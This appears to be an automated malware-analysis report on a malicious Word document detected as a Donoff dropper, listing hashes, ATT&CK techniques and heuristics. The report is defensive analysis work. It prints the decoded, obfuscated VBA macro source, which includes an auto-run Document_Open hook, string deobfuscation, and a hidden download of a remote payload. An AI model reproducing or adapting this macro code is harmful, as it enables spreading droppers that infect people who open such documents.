Office (OLE) malware analysis — malicious · f7e706f377d7565a

MALICIOUS

Office (OLE)

139.0 KB Created: 2016-06-01 23:34:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: 7b0b0c54ac3fcc3ee3780dbc6fc00435 SHA-1: 4182a987c37e034c056b759f579243acd3413457 SHA-256: f7e706f377d7565a97308f38a4f930653c43e4af2b2526e76b3ef6f408d9b8ec

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The critical ClamAV detection and high-severity heuristics for VBA macros, including the presence of a Document_Open auto-execution macro, indicate malicious intent. The VBA script likely attempts to download and execute a second-stage payload, as suggested by the CreateObject and CallByName calls. The benign URLs extracted are likely unrelated to the malicious functionality.

Heuristics 7

ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17234 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17234 bytes
SHA-256: `38dbd9c7ecc3f7606d0ab7df0945b80874ec8fbd8923d0448f73b2a5b59c624e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function KysCHNNe(ByVal ZGJyg As Integer) As String tXcQRtut lpbERSNDaxbdz 8198 If nHOgf(8828, "5sU") Then GfaYzzMsurWVdo AlyOxOv = 7276 vxXdW 4905, "FkZtH" trBtKu End If QWLYuW = "csaG5" KysCHNNe = "h7k" End Function Private Function dHayHlT() As Integer wRaflnQ False aIyhOsJlLqfCA 2233, "4w" FQUxKCsRYLax dHayHlT = 5204 End Function Private Function nlnCg() As String If WnWgMAA(9126) Then EWWqQFGGualdgn = 8634 FALunEdW Else Qjcms True mjWQtMhc TGSPgqPkBJfdU End If WysHtTTvXnTz = True nlnCg = "XAFCg" End Function Private Sub Document_Open() jexAq.uZKpyqK End Sub Private Function KwHTrWyzJrqeH(ByVal qXqbeKJmt As String, ByVal taShrg As Integer) As Integer tJklVbuPVVOzZT 4374 IKBqnI ClFiIUjErv If IqcBZLOVA Then PrNZEFC Else genNnCjjzMYU = "" aYYdzK rEpFvUYkqAJdB End If KwHTrWyzJrqeH = 1337 End Function Attribute VB_Name = "jexAq" Private Function TMJtcLA(ByVal ynRTPigUZ As Object, ByVal ZSscjIRoMc As Boolean) As Object Dim IHmiJeBYEeXI As Integer iYSPr = False Set TMJtcLA = ynRTPigUZ End Function Public Sub uZKpyqK() On Error GoTo cvTtINY tjIFDR.rowApbhdHCX kHpWGdqXemY = True tjIFDR.LXhuBkU WtKSSwKXN Exit Sub TnHbSltZaJT = 5724 cvTtINY: End Sub Private Sub WtKSSwKXN() Dim OYITvCasYKDprC As String Dim aLTXD As Integer VrsODYtIY = "" uTDEJGFB 5737, ZLNDgtANuHa.eLdPmJO, ILJiVekrtzaF.nyPHmxZmMLbl("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ") PQacjcrY = 6867 ZLNDgtANuHa.fhKjKlfKxlsj 6258, ZLNDgtANuHa.eLdPmJO End Sub Public Function scZUqkxFLSkeAB(ByVal laXxuzjRjeMC As String) As Object Dim pJoclwRSoeqp As String Dim oINsWXdeCmAh As Boolean KAlINwEx = "aLv0" Set scZUqkxFLSkeAB = TMJtcLA(CreateObject(laXxuzjRjeMC), True) End Function Private Function qgLXZbV(ByVal GZXghsOVe As String) As Integer If fIwVcmoC(8404, "TQ") Then ACZBE = 7354 OdOIc pKyuLRBpb EEeJREForiBFF reNRGMoj = "X3w" Else WkaVSJbFkFE AbdbiXOFQxxyt "fmN", 4897 gXhyNzAuIBNBIO End If YnlwGZU 4147, 3708, 9625 qgLXZbV = 2465 End Function Private Sub uTDEJGFB(ByVal biZnMnBOVW As Integer, ByVal fesfoMyDhRl As String, ByVal nxTEQ As String) Dim OyVIWQFS As Integer Set dhXMABZ = lGmZKwAXr.qiEPXjuv(nxTEQ, 7913, True) lGmZKwAXr.qAMemkBN "g8oX2", RtcSzUCfqYe, 3895, dhXMABZ RDhbxYKEqVnR = True ZLNDgtANuHa.RCsVbLm 6655, ZlwGqufW.voUTMy(2621, dhXMABZ, "Dg8MT", ILJiVekrtzaF.nyPHmxZmMLbl("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "amc", fesfoMyDhRl End Sub Private Function RtcSzUCfqYe() As String RtcSzUCfqYe = ILJiVekrtzaF.nyPHmxZmMLbl("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y") End Function Attribute VB_Name = "ILJiVekrtzaF" Private Sub PBrUm() qteMwvl False, 4187, False zKKSyhwO 3928, True, 3091 End Sub Public Function teaAxNrDYanFS(ByVal pNKEExsGoh As String, ByVal MMQCgrDnwefQ As Boolean, ByVal idkLvmk As String) As String Dim frdDAZ As Boolean Dim jIYZpA As Integer sIPNszKNf = "4Plps" teaAxNrDYanFS = pNKEExsGoh & idkLvmk End Function Private Sub KtmRAadF() SzETBIuecVGeS 3835, "Kph9x", 8764 cLFbb 5484, 760, 7177 IoVnIyysRI = 3182 AOsfcpuLswR End Sub Private Function elUhjPn(ByVal gOnYMY As String, ByVal pWEpk As String) As String If Not wWDvWemQb.elczPK("", pWEpk, gOnYMY, "aQ") Then elUhjPn = pWEpk End If End Function Private Function QzBWFlE() As Integer iKOZTim = "z2tY" QzBWFlE = 1 End Function Public Function nyPHmxZmMLbl(ByVal StdRFlF As String, ByVal CqHJDzZ As String) As String Dim mYspRohMtjn As String Dim kNECCP As String Dim KUpCKggnJsemRI As Integer For lUYYw = QzBWFlE To wWDvWemQb.OIMWMEeNzjLuHI(StdRFlF) mYspRohMtjn = elUhjPn(CqHJDzZ, wWDvWemQb.vsdTsohsHoPG(StdRFlF, 9996, lUYYw, True)) nyPHmxZmMLbl = teaAxNrDYanFS(nyPHmxZmMLbl, True, mYspRohMtjn) Next End Function At ... (truncated)

SHA-256: 38dbd9c7ecc3f7606d0ab7df0945b80874ec8fbd8923d0448f73b2a5b59c624e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function KysCHNNe(ByVal ZGJyg As Integer) As String
tXcQRtut
lpbERSNDaxbdz 8198
If nHOgf(8828, "5sU") Then
GfaYzzMsurWVdo
AlyOxOv = 7276
vxXdW 4905, "FkZtH"
trBtKu
End If
QWLYuW = "csaG5"
KysCHNNe = "h7k"
End Function
Private Function dHayHlT() As Integer
wRaflnQ False
aIyhOsJlLqfCA 2233, "4w"
FQUxKCsRYLax
dHayHlT = 5204
End Function
Private Function nlnCg() As String
If WnWgMAA(9126) Then
EWWqQFGGualdgn = 8634
FALunEdW
Else
Qjcms True
mjWQtMhc
TGSPgqPkBJfdU
End If
WysHtTTvXnTz = True
nlnCg = "XAFCg"
End Function
Private Sub Document_Open()
jexAq.uZKpyqK
End Sub
Private Function KwHTrWyzJrqeH(ByVal qXqbeKJmt As String, ByVal taShrg As Integer) As Integer
tJklVbuPVVOzZT 4374
IKBqnI
ClFiIUjErv
If IqcBZLOVA Then
PrNZEFC
Else
genNnCjjzMYU = ""
aYYdzK
rEpFvUYkqAJdB
End If
KwHTrWyzJrqeH = 1337
End Function

Attribute VB_Name = "jexAq"
Private Function TMJtcLA(ByVal ynRTPigUZ As Object, ByVal ZSscjIRoMc As Boolean) As Object
Dim IHmiJeBYEeXI As Integer
iYSPr = False
Set TMJtcLA = ynRTPigUZ
End Function
Public Sub uZKpyqK()
On Error GoTo cvTtINY
tjIFDR.rowApbhdHCX
kHpWGdqXemY = True
tjIFDR.LXhuBkU
WtKSSwKXN
Exit Sub
TnHbSltZaJT = 5724
cvTtINY:
End Sub
Private Sub WtKSSwKXN()
Dim OYITvCasYKDprC As String
Dim aLTXD As Integer
VrsODYtIY = ""
uTDEJGFB 5737, ZLNDgtANuHa.eLdPmJO, ILJiVekrtzaF.nyPHmxZmMLbl("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ")
PQacjcrY = 6867
ZLNDgtANuHa.fhKjKlfKxlsj 6258, ZLNDgtANuHa.eLdPmJO
End Sub
Public Function scZUqkxFLSkeAB(ByVal laXxuzjRjeMC As String) As Object
Dim pJoclwRSoeqp As String
Dim oINsWXdeCmAh As Boolean
KAlINwEx = "aLv0"
Set scZUqkxFLSkeAB = TMJtcLA(CreateObject(laXxuzjRjeMC), True)
End Function
Private Function qgLXZbV(ByVal GZXghsOVe As String) As Integer
If fIwVcmoC(8404, "TQ") Then
ACZBE = 7354
OdOIc
pKyuLRBpb
EEeJREForiBFF
reNRGMoj = "X3w"
Else
WkaVSJbFkFE
AbdbiXOFQxxyt "fmN", 4897
gXhyNzAuIBNBIO
End If
YnlwGZU 4147, 3708, 9625
qgLXZbV = 2465
End Function
Private Sub uTDEJGFB(ByVal biZnMnBOVW As Integer, ByVal fesfoMyDhRl As String, ByVal nxTEQ As String)
Dim OyVIWQFS As Integer
Set dhXMABZ = lGmZKwAXr.qiEPXjuv(nxTEQ, 7913, True)
lGmZKwAXr.qAMemkBN "g8oX2", RtcSzUCfqYe, 3895, dhXMABZ
RDhbxYKEqVnR = True
ZLNDgtANuHa.RCsVbLm 6655, ZlwGqufW.voUTMy(2621, dhXMABZ, "Dg8MT", ILJiVekrtzaF.nyPHmxZmMLbl("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "amc", fesfoMyDhRl
End Sub
Private Function RtcSzUCfqYe() As String
RtcSzUCfqYe = ILJiVekrtzaF.nyPHmxZmMLbl("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y")
End Function

Attribute VB_Name = "ILJiVekrtzaF"
Private Sub PBrUm()
qteMwvl False, 4187, False
zKKSyhwO 3928, True, 3091
End Sub
Public Function teaAxNrDYanFS(ByVal pNKEExsGoh As String, ByVal MMQCgrDnwefQ As Boolean, ByVal idkLvmk As String) As String
Dim frdDAZ As Boolean
Dim jIYZpA As Integer
sIPNszKNf = "4Plps"
teaAxNrDYanFS = pNKEExsGoh & idkLvmk
End Function
Private Sub KtmRAadF()
SzETBIuecVGeS 3835, "Kph9x", 8764
cLFbb 5484, 760, 7177
IoVnIyysRI = 3182
AOsfcpuLswR
End Sub
Private Function elUhjPn(ByVal gOnYMY As String, ByVal pWEpk As String) As String
If Not wWDvWemQb.elczPK("", pWEpk, gOnYMY, "aQ") Then
elUhjPn = pWEpk
End If
End Function
Private Function QzBWFlE() As Integer
iKOZTim = "z2tY"
QzBWFlE = 1
End Function
Public Function nyPHmxZmMLbl(ByVal StdRFlF As String, ByVal CqHJDzZ As String) As String
Dim mYspRohMtjn As String
Dim kNECCP As String
Dim KUpCKggnJsemRI As Integer
For lUYYw = QzBWFlE To wWDvWemQb.OIMWMEeNzjLuHI(StdRFlF)
mYspRohMtjn = elUhjPn(CqHJDzZ, wWDvWemQb.vsdTsohsHoPG(StdRFlF, 9996, lUYYw, True))
nyPHmxZmMLbl = teaAxNrDYanFS(nyPHmxZmMLbl, True, mYspRohMtjn)
Next
End Function

At
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.